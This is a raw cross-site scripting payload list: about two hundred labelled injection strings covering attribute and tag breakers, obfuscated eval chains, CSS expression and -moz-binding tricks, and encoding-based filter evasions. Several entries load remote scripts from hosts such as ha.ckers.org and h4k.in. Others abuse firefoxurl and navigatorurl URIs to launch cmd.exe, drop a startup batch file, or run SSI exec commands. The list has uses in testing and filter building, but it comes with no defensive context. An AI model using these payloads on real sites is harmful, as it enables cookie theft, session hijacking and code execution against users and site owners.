Add onclick event hadler
onclick=eval/**/(/ale/.source%2b/rt/.source%2b/(7)/.source);
<s>000<s>%3cs%3e111%3c/s%3e%3c%73%3e%32%32%32%3c%2f%73%3e<s>333</s><s>444</s>
Advanced HTML injection locator
';alert(0)//\';alert(1)//";alert(2)//\";alert(3)//--></SCRIPT>">'><SCRIPT>alert(4)</SCRIPT>=&{}");}alert(6);function xss(){//
Advanced XSS Locator
';alert(0)//\';alert(1)//";alert(2)//\";alert(3)//--></SCRIPT>">'></title><SCRIPT>alert(4)</SCRIPT>=&{</title><script>alert(5)</script>}");}
Advanced XSS Locator for title-Injections
aim: &c:\windows\system32\calc.exe" ini="C:\Documents and Settings\All Users\Start Menu\Programs\Startup\pwnd.bat"
aim: uri exploit
<div/style=\-\mo\z\-b\i\nd\in\g:\url(//business\i\nfo.co.uk\/labs\/xbl\/xbl\.xml\#xss)>
Backslash-obfuscated XBL injection - variant 1
<div/style=\-\mo\z\-&
#98\i\nd\in\g:&
#92url(//busi&
#110ess\i\nfo.&
#99o.uk\/labs
\/xbl\/xbl\
.xml\#xss)&>
Backslash-obfuscated XBL injection - variant 2
<div style=\-\mo\z\-b\i\nd\in\g:\url(//business\i\nfo.co.uk\/labs\/xbl\/xbl\.xml\#xss)>
Backslash-obfuscated XBL injection - variant 3
<div    style=\-\mo\z\-b\i\nd\in\g:\url(//business\i\nfo.co.uk\/labs\/xbl\/xbl\.xml\#xss)>
Backslash-obfuscated XBL injection - variant 4
<x/style=-m\0o\0z\0-b\0i\0nd\0i\0n\0g\0:\0u\0r\0l\0(\0/\0/b\0u\0s\0i\0ne\0s\0s\0i\0nf\0o\0.c\0o\0.\0u\0k\0/\0la\0b\0s\0/\0x\0b\0l\0/\0x\0b\0l\0.\0x\0m\0l\0#\0x\0s\0s\0)>
Backslash-obfuscated XBL injection - variant 5
<BASE HREF="javascript:alert('XSS');//">
BASE
`> <script>alert(5)</script>
Basic back ticked attribute breaker
> <script>alert(4)</script>
Basic double quoted attribute breaker
xyz onerror=alert(6);
Basic JS breaker
1;a=eval;b=alert;a(b(/c/.source));
Basic JS breaker variant 1
1];a=eval;b=alert;a(b(17));//
Basic JS breaker variant 2
];a=eval;b=alert;a(b(16));//
Basic JS breaker variant 3
'];a=eval;b=alert;a(b(15));//
Basic JS breaker variant 4
1};a=eval;b=alert;a(b(14));//
Basic JS breaker variant 5
'};a=eval;b=alert;a(b(13));//
Basic JS breaker variant 6
};a=eval;b=alert;a(b(12));//
Basic JS breaker variant 7
a=1;a=eval;b=alert;a(b(11));//
Basic JS breaker variant 8
;//%0da=eval;b=alert;a(b(10));//
Basic JS breaker variant 9
';//%0da=eval;b=alert;a(b(9));//
Basic JS breaker variant 10
'> <script>alert(3)</script>
Basic single quoted attribute breaker
</title><script>alert(1)</script>
Basic title breaker
<BGSOUND SRC="javascript:alert('XSS');">
BGSOUND
<BODY BACKGROUND="javascript:alert('XSS');">
BODY background-image
<BODY ONLOAD=alert('XSS')>
BODY ONLOAD
<!--
<A href="
- --><a href=javascript:alert:document.domain
>test-->
Camouflaged comment injection with JS link
<IMG SRC=JaVaScRiPt:alert('XSS')>
Case Insensitive
<%3C<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<\x3c\x3C\u003c\u003C
Character Encoding Example
<script>
var a = "</script> <script> alert('XSS !'); </script> <script>";
</script>
Closing JS Tag in JS String assignment
<!--[if gte IE 4]><SCRIPT>alert('XSS');</SCRIPT><![endif]-->
Commented-out Block
*/a=eval;b=alert;a(b(/e/.source));/*
Comment-breaker using obfuscated JavaScript
width: expression((window.r==document.cookie)?'':alert(r=document.cookie))
Conditional style injection for IE
<A HREF="http://www.gohttp://www.google.com/ogle.com/">XSS</A>
Content Replace
<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>">
Cookie Manipulation
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
DIV background-image 1
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
DIV background-image 2
<DIV STYLE="width: expression(alert('XSS'));">
DIV expression
<DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029">
DIV w/Unicode
<IFRAME SRC=http://ha.ckers.org/scriptlet.html <
Double open angle brackets
<A HREF="http://1113982867/">XSS</A>
Dword Encoding
<EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>
Embed Flash
<IMG SRC="jav
ascript:alert('XSS');">
Embedded Carriage Return
<IMG SRC="jav	ascript:alert('XSS');">
Embedded Encoded Tab
<IMG SRC="jav
ascript:alert('XSS');">
Embedded Newline
<IMG SRC="javascript:alert('XSS');">
Embedded Tab
</TITLE><SCRIPT>alert("XSS");</SCRIPT>
End title tag
\";alert('XSS');//
Escaping JavaScript escapes
<SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
Evade Regex Filter 1
<SCRIPT ="blah" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
Evade Regex Filter 2
<SCRIPT a="blah" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT>
Evade Regex Filter 3
<SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
Evade Regex Filter 4
<SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT>
Evade Regex Filter 5
eval(name)
Eval string contained in name property
<A HREF="http://www.google.com./">XSS</A>
Extra dot for Absolute DNS
<<SCRIPT>alert("XSS");//<</SCRIPT>
Extraneous Open Brackets
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT>
Filter Evasion 1
<SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
Filter Evasion 2
<A HREF="//google">XSS</A>
Firefox Lookups 1
<A HREF="http://ha.ckers.org@google">XSS</A>
Firefox Lookups 2
<A HREF="http://google:ha.ckers.org">XSS</A>
Firefox Lookups 3
firefoxurl:test|"%20-new-window%20javascript:alert(\'Cross%2520Browser%2520Scripting!\');"
firefoxurl: uri exploit (UXSS)
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
FRAME
<IMG SRC=`javascript:alert("RSnake says### 'XSS'")`>
Grave Accents
<IMG SRC="javascript:alert('XSS')"
Half-Open HTML/JavaScript
<A HREF="http://0x42.0x0000066.0x7.0x93/">XSS</A>
Hex Encoding
<IMG SRC=javascript:alert('XSS')>
Hex Encoding w/out Semicolons
<IMG SRC=javascript:alert("XSS")>
HTML Entities
'';!--"<script>alert(0);</script>=&{(alert(1))}
HTML Quoute & Comment breaker
<?xml version="1.0"?>
<html:html xmlns:html='http://www.w3.org/1999/xhtml'>
<html:script>
alert(document.cookie);
</html:script>
</html:html>
HTML wrapped in XML
<img src=`x` onrerror= ` ;; alert(1) ` />
IE backticked semicolon injection
</a style=""xx:expr/**/ession(document.appendChild(document.createElement('script')).src='http://h4k.in/i.js')">
IE closing-tag expression injection
style=color: expression(alert(0));" a="
IE expression injection
vbscript:Execute(MsgBox(chr(88)&chr(83)&chr(83)))<
IE VB Messagebox injection
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
IFRAME
a=<a>
<b>
%3c%69%6d%67%2f%73%72%63%3d%31
%20%6f%6e%65%72%72%6f%72%3d%61%6c%65%72%74%28%31%29%3e
</b>
</a>
document.write(unescape(a..b))
Image onerror wrapped in XML statement
<IMG SRC="jav	ascript:alert(<WBR>'XSS');">
<IMG SRC="jav
ascript:alert(<WBR>'XSS');">
<IMG SRC="jav
ascript:alert(<WBR>'XSS');">
Image tag with obfuscated JS URI
<IMG SRC=javascript:alert(String.fromCharCode(88###83###83))>
Image w/CharCode
<IMG DYNSRC="javascript:alert('XSS');">
IMG Dynsrc
<IMG SRC="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode">
IMG Embedded commands 1
Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser
IMG Embedded commands 2
<IMG LOWSRC="javascript:alert('XSS');">
IMG Lowsrc
<IMG SRC=javascript:alert('XSS')>
IMG No Quotes/Semicolon
exp/*<XSS STYLE='no\xss:noxss("*//*");xss:ex/*XSS*//*/*/pression(alert("XSS"))'>
IMG STYLE w/expression
<IMG SRC="javascript:alert('XSS');">
IMG w/JavaScript Directive
<IMG SRC='vbscript:msgbox("XSS")'>
IMG w/VBscript
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
INPUT Image
<A HREF="http://66.102.7.147/">XSS</A>
IP Encoding
s1=''+'java'+''+'scr'+'';s2=''+'ipt'+':'+'ale'+'';s3=''+'rt'+''+'(1)'+''; u1=s1+s2+s3;URL=u1
JavaScript concatenation vector variant 1
s1=0?'1':'i'; s2=0?'1':'fr'; s3=0?'1':'ame'; i1=s1+s2+s3; s1=0?'1':'jav'; s2=0?'1':'ascr'; s3=0?'1':'ipt'; s4=0?'1':':'; s5=0?'1':'ale'; s6=0?'1':'rt'; s7=0?'1':'(1)'; i2=s1+s2+s3+s4+s5+s6+s7;
JavaScript concatenation vector variant 2
s1=0?'':'i';s2=0?'':'fr';s3=0?'':'ame';i1=s1+s2+s3;s1=0?'':'jav';s2=0?'':'ascr';s3=0?'':'ipt';s4=0?'':':';s5=0?'':'ale';s6=0?'':'rt';s7=0?'':'(1)';i2=s1+s2+s3+s4+s5+s6+s7;i=createElement(i1);i.src=i2;x=parentNode;x.appendChild(i);
JavaScript concatenation vector variant 3
s1=['java'+''+''+'scr'+'ipt'+':'+'aler'+'t'+'(1)'];
JavaScript concatenation vector variant 4
s1=['java'||''+'']; s2=['scri'||''+'']; s3=['pt'||''+''];
JavaScript concatenation vector variant 5
s1=!''&&'jav';s2=!''&&'ascript';s3=!''&&':';s4=!''&&'aler';s5=!''&&'t';s6=!''&&'(1)';s7=s1+s2+s3+s4+s5+s6;URL=s7;
JavaScript concatenation vector variant 6
s1='java'||''+'';s2='scri'||''+'';s3='pt'||''+'';
JavaScript concatenation vector variant 7
<BR SIZE="&{alert('XSS')}">
JavaScript Includes
<A HREF="javascript:document.location='http://www.google.com/'">XSS</A>
JavaScript Link Location
%0da=eval;b=alert;a(b(/d/.source));
JavaScript-breaker using carriage return
<a href = "javas cript :ale rt(1)">test
JS link with whitespace obfuscation
+alert(0)+
JS string concatenation breaker
<body onload=;a2={y:eval};a1={x:a2.y('al'+'ert')};;;;;;;;;_=a1.x;_(1);;;;
JSON based obfuscated onload vector
<body onload=a1={x:this.parent.document};a1.x.writeln(1);>
JSON based onload vector
<body onload=;a1={x:document};;;;;;;;;_=a1.x;_.write(1);;;;
JSON based semicolon-onload vector
<LAYER SRC="http://ha.ckers.org/scriptlet.html"></LAYER>
LAYER
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS
List-style-image
<IMG SRC="livescript:[code]">
Livescript
<XSS STYLE="behavior: url(http://ha.ckers.org/xss.htc);">
Local .htc file
<IMG SRC=javascript:alert('XSS')>
Long UTF-8 Unicode w/out Semicolons
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
Malformed IMG Tags
%26%2339);x=alert;x(%26%2340 /finally through!/.source %26%2341);//
Markup breaker with special quotes
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">
META
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">
META w/additional URL parameter
<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64###PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
META w/data:URL
<A HREF="http://6	6.000146.0x7.147/">XSS</A>
Mixed Encoding
<IMG SRC="mocha:[code]">
Mocha
style=-moz-binding:url(http://h4k.in/mozxss.xml#xss);" a="
Mozilla -moz-binding-url injection
sstyle=foobar"tstyle="foobar"ystyle="foobar"lstyle="foobar"estyle="foobar"=-moz-binding:url(http://h4k.in/mozxss.xml#xss)>foobar</b>#xss)" a="
Mozilla -moz-binding-url injection - filter evading
_
=
eval
b=1
__
=
location
c=1
_
(
__
.
hash
//
.
substr
(1)
)
Multiline selfcontained XSS
<IMGSRC="javascript:alert('XSS')">
Multiline w/Carriage Returns
b=top,a=/loc/ . source,a+=/ation/ . source,b[a=a] = name
Name contained XSS variant 1
a=/ev///
.source a+=/al///
.source a[a] (name)
Name contained XSS variant 2
a=/ev/
.source a+=/al/
.source,a = a[a] a(name)
Name contained XSS variant 3
setTimeout//
(name// ,0)
Name contained XSS variant 4
navigatorurl:test" -chrome "javascript:C=Components.classes;I=Components.interfaces;file=C[\'@mozilla.org/file/local;1\'].createInstance(I.nsILocalFile);file.initWithPath(\'C:\'+String.fromCharCode(92)+String.fromCharCode(92)+\'Windows\'+String.fromCharCode(92)+String.fromCharCode(92)+\'System32\'+String.fromCharCode(92)+String.fromCharCode(92)+\'cmd.exe\');process=C[\'@mozilla.org/process/util;1\'].createInstance(I.nsIProcess);process.init(file);process.run(true%252c{}%252c0);alert(process)
navigatorurl: code execution
<SCRIPT SRC=http://ha.ckers.org/xss.js
No Closing Script Tag
<SCRIPT>a=/XSS/alert(a.source)</SCRIPT>
No Quotes/Semicolons
<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>
Non-Alpha/Non-Digit
<BODY onload!#$%&()*~+-_.###:;?@[/|\]^`=alert("XSS")>
Non-Alpha/Non-Digit Part 2
</noscript>
<code onmouseover=a=eval;b=alert;a(b(/h/.source));>MOVE MOUSE OVER THIS AREA</code>
Noscript-breaker with mouseover
perl -e 'print "<IMG SRC=java\0script:alert("XSS")>";'> out
Null Chars 1
perl -e 'print "&<SCR\0IPT>alert("XSS")</SCR\0IPT>";' > out
Null Chars 2
<body onload=;;;;;;;;;;;_=alert;_(1);;;;
Obfuscated body onload vector
s1=0?'':'i';s2=0?'':'fr';s3=0?'':'ame';i1=s1+s2+s3;s1=0?'':'jav';s2=
0?'':'ascr';s3=0?'':'ipt';s4=0?'':':';s5=0?'':'ale';s6=0?'':'rt';s7=
0?'':'(1)';i2=s1+s2+s3+s4+s5+s6+s7;i=createElement(i1);i.src=i2;x=pa
rentNode;x.appendChild(i);
Obfuscated DOM element creation
<body <body onload=;;;;;al:eval('al'+'ert(1)');;>
Obfuscated double-body onload vector
<IMGSRC=java&<WBR>#115;crip&<WBR>#116;:a
le&<WBR>#114;t('XS<WBR>;S')>
Obfuscated image tag using dec entities
<IMGSRC=javas&<WBR>#x63ript:&<WBR>#x61lert(
&<WBR>#x27XSS')>
Obfuscated image tag using hex entities
<IMGSRC=ja&<WBR>#0000118as&<WBR>#0000099ri&<WBR>#0000112t:
&<WBR>#0000097le&<WBR>#0000114t(&<WBR>#0000039XS&<WBR>#0000083')>
Obfuscated image tag using long dec entities
>"'><img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;
alert(%26quot;%26%23x20;XSS%26%23x20;Test%26%23x20;Successful%26quot;)>
Obfuscated JS image source
(1?(1?{a:1?""[1?"ev\a\l":0](1?"\a\lert":0):0}:0).a:0)[1?"\c\a\l\l":0](content,1?"x\s\s":0)
Obfuscated name trigger for Firefox
<body/s/onload=x={doc:parent.document};x.doc.writeln(1)
Obfuscated onload attribute variant 1
<body/””$/onload=x={doc:parent['document']};x.doc.writeln(1)
Obfuscated onload attribute variant 2
<body/""$/onload=x={doc:parent['document']};x.doc.writeln(1)
Obfuscated onload attribute variant 3
(ah: added 05-dec-11)
123[''+<_>ev</_>+<_>al</_>](''+<_>aler</_>+<_>t</_>+<_>(1)</_>);
Obfuscated XML predicate vector variation 1
s1=<s>evalalerta(1)a</s>,s2=<s></s>+'',s3=s1+s2,e1=/s/!=/s/?s3[0]:
0,e2=/s/!=/s/?s3[1]:0,e3=/s/!=/s/?s3[2]:0,e4=/s/!=/s/?s3[3]:0,e=/s/!=/
s/?0[e1+e2+e3+e4]:0,a1=/s/!=/s/?s3[4]:0,a2=/s/!=/s/?s3[5]:0,a3=/s/!=/
s/?s3[6]:0,a4=/s/!=/s/?s3[7]:0,a5=/s/!=/s/?s3[8]:0,a6=/s/!=/s/?s3[10]:
0,a7=/s/!=/s/?s3[11]:0,a8=/s/!=/s/?s3[12]:
0,a=a1+a2+a3+a4+a5+a6+a7+a8,1,e(a)
Obfuscated XML predicate vector variation 2
o={x:''+<s>eva</s>+<s>l</s>,y:''+<s>aler</s>+<s>t</s>+<s>(1)</
s>};function f() { 0[this.x](this.y) }f.call(o);
Obfuscated XML predicate vector variation 3
___=1?'ert(123)':0,_=1?'al':0,__=1?'ev':0,1[__+_](_+___)
Obfuscated XSS variant 1
<OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT>
OBJECT
<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS')></OBJECT>
OBJECT w/Embedded XSS
a="get"; b="URL(""; c="javascript:"; d="alert('XSS');")";eval(a+b+c+d);
OBJECT w/Flash 2
<A HREF="http://0102.0146.0007.00000223/">XSS</A>
Octal Encoding
open(name)
Open string contained in name property
<? echo('<SCR)';echo('IPT>alert("XSS")</SCRIPT>'); ?>
PHP
alert(1)
Plain JavaScript alert
<A HREF="//www.google.com/">XSS</A>
Protocol Resolution Bypass
<SCRIPT SRC=//ha.ckers.org/.j>
Protocol resolution in script tags
0%0d%0a%00<script src=//h4k.in>
RegExp based, and native C filter vector.
s1=''+'java'+''+'scr'+'';s2=''+'ipt'+':'+'ale'+'';s3=''+'rt'+''+'(1)
'+'';
u1=s1+s2+s3;URL=u1
Remote IE URL overloading
<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">
Remote Stylesheet 1
<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>
Remote Stylesheet 2
<META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet">
Remote Stylesheet 3
<STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE>
Remote Stylesheet 4
<A HREF="http://google.com/">XSS</A>
Removing Cnames
<SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT>
Rename .js to .jpg
res://c:\\program%20files\\adobe\\acrobat%207.0\\acrobat\\acrobat.dll/#2/#210
res:// installed software probing
<SCRIPT>alert('XSS')</SCRIPT>
SCRIPT w/Alert()
<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
SCRIPT w/Char Code
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
SCRIPT w/Source File
a=0||'ev'+'al',b=0||location.hash,c=0||'sub'+'str',1[a](b[c](1))
Self-contained XSS variant 1
a=0||'ev'+'al'||0;b=0||'locatio';b+=0||'n.h'+'ash.sub'||0;b+=0||'str(1)';c=b[a];c(c(b))
Self-contained XSS variant 2
eval.call(this,unescape.call(this,location))
Self-contained XSS variant 3
d=0||'une'+'scape'||0;a=0||'ev'+'al'||0;b=0||'locatio';b+=0||'n'||0;c=b[a];d=c(d);c(d(c(b)))
Self-contained XSS variant 4
l= 0 || 'str',m= 0 || 'sub',x= 0 || 'al',y= 0 || 'ev',g= 0 || 'tion.h',f= 0 || 'ash',k= 0 || 'loca',d= (k) + (g) + (f),a
Self-contained XSS variant 5
_=eval,__=unescape,___=document.URL,_(__(___))
Self-contained XSS variant 6
$_=document,$__=$_.URL,$___=unescape,$_=$_.body,$_.innerHTML = $___(http=$__)
Self-contained XSS variant 7
$=document,$=$.URL,$$=unescape,$$$=eval,$$$($$($))
Self-contained XSS variant 8
evil=/ev/.source+/al/.source,changeProto=/Strin/.source+/g.prototyp/.source+/e.ss=/.source+/Strin/.source+/g.prototyp/.source+/e.substrin/.source+/g/.source,hshCod=/documen/.source+/t.locatio/.source+/n.has/.source+/h/.source;7[evil](changeProto);hsh=7[evil](hshCod),cod=hsh.ss(1);7[evil](cod)
Self-contained XSS variant 9
with(location)with(hash)eval(substring(1))
Self-containing XSS with no dots
<IMG SRC="  javascript:alert('XSS');">
Spaces/Meta Chars
<!--#exec cmd="/bin/echo '<SCRIPT SRC'"--><!--#exec cmd="/bin/echo '=http://ha.ckers.org/xss.js></SCRIPT>'"-->
SSI
<STYLE TYPE="text/javascript">alert('XSS');</STYLE>
STYLE
<style>
body:after{
content: “\61\6c\65\72\74\28\31\29″
}
</style>
<script>
eval(eval(document.styleSheets[0].cssRules[0].style.content))
</script>
Style injection via content and double-eval
<XSS STYLE="xss:expression(alert('XSS'))">
STYLE w/Anonymous HTML
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
STYLE w/background
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>
STYLE w/background-image
<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
STYLE w/broken up JavaScript
<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">
STYLE w/Comment
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">
Stylesheet
}</style><script>a=eval;b=alert;a(b(/i/.source));</script>
Style-breaker using obfuscated JavaScript
>"'
Super basic HTML breaker 2
a=alert
a(0)
Super short XSS variant 1
A=alert;A(1)
Super short XSS variant 2
<TABLE BACKGROUND="javascript:alert('XSS')"></TABLE>
TABLE
<TABLE><TD BACKGROUND="javascript:alert('XSS')"></TD></TABLE>
TD
</textarea>
<code onmouseover=a=eval;b=alert;a(b(/g/.source));>MOVE MOUSE OVER THIS AREA</code>
Textarea-breaker with mouseover
'%uff1cscript%uff1ealert('XSS')%uff1c/script%uff1e'
Unicode encoded script tags
http://aa"><script>alert(123)</script>
URL breaker for double quotes
http://aa'><script>alert(123)</script>
URL breaker for single quotes
>%22%27><img%20src%3d%22javascript:alert(%27%20XSS%27)%22>
URL encoded image source